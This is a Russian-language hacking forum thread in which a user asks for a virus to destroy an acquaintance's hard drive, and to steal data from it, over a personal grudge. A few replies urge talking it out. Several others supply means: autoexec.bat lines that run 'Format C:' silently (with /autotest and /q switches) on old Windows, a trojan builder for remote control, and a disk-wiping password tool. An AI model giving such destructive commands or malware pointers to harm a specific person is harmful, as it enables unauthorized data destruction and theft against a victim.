Нужен вирус для убивания фс | BESK.SU - программирование без границ (c) 2025

Нужен вирус для убивания фс

ilivit

Турист
Credits
0
Возникла небольшая проблемка с одним "знакомым"(конфликт так сказать=)). Так вот надо ему подпортить хард, да лучше так, чтоб инфу не восстановить, ну или хотябы MBR. Где взять что нибудь подходящее?

741

Турист
Credits
0
ой не хорошо это, уж лучше за пивом найти общий язык

честно скажу, не сторонник такого решения вопросов, уж больно часто поднимаю винты :)

Bergood

Турист
Credits
0
может проще с ним впрямую поговрить.
а то такой способ тебе плюса не дает

ilivit

Турист
Credits
0
Дело в том, что поговорить с ним не получится(ну совсем никак). Нужно просто сломать ему винт, и ,по возможности, спереть оттуда инфу. А вообще это надо не конкретно мне, а одним знакомым: он им насолил и разговор врядли получится.

741

Турист
Credits
0
ilivit, ну так пусть они и разбираются между собой, так и виноватым стать не долго :)

такой вирус в работе видел, но возможности спереть он не давал

ilivit

Турист
Credits
0
741 написал(а):
так и виноватым стать не долго :)
"А я чего? Я, ничего."(с) Это я просто так спросил, интересно ведь(хе-хе)

741 написал(а):
такой вирус в работе видел, но возможности спереть он не давал
Это случайно не "Чернобыль"? Если нет, можешь поделиться или информацию подкинуть? А то, что спереть не дает - я не про него, а про троян.

Susliks

Турист
Credits
0
открваешь файл autoexe.bat пишешь в нём:
echo on;Format C: | y
и наслаждаешься..
псоле перезагрузки винт форматируеца сам без спроса.....

sergsey

Турист
Credits
0
Если поспорили -можно либо за пивом договориться,либо интерфейс ему попортить.Винт то причем.....Не виноватый он.Да и гаденько как то выглядит.

ALEXRUS

Профи
Свой / Own
Credits
104
открваешь файл autoexe.bat пишешь в нём:
echo on;Format C: | y
и наслаждаешься..
псоле перезагрузки винт форматируеца сам без спроса.....
Вроде можно сделать это так: format c: /autotest ещё атрибут /q можно добавить для быстрой смерти.

Хотя это только на 98 и ниже виндах сработает.

Kuzma

Турист
Credits
20
Когда то хотел проэксперементировать, но пропала надобность. Ищещь Trojan-конструктор :) Lammer's Death. С помощью онного внедряешь в любую прогу часть червя, а потом удалённо играешся с системой. Но это было давно. Наверно такие лазейки уже прикрыты.

gensvadim

Турист
Credits
0
если есть доступ к компьютеру попробуй установи программу Hara-Kiri и поставить под защиту все диски,если потом во время загрузки не ввести пароль,то Hara-Kiri стерает всю информацию,версию 2.01 рабочую можно найти в сети,а на 2.02 кряка не встречал

Сверху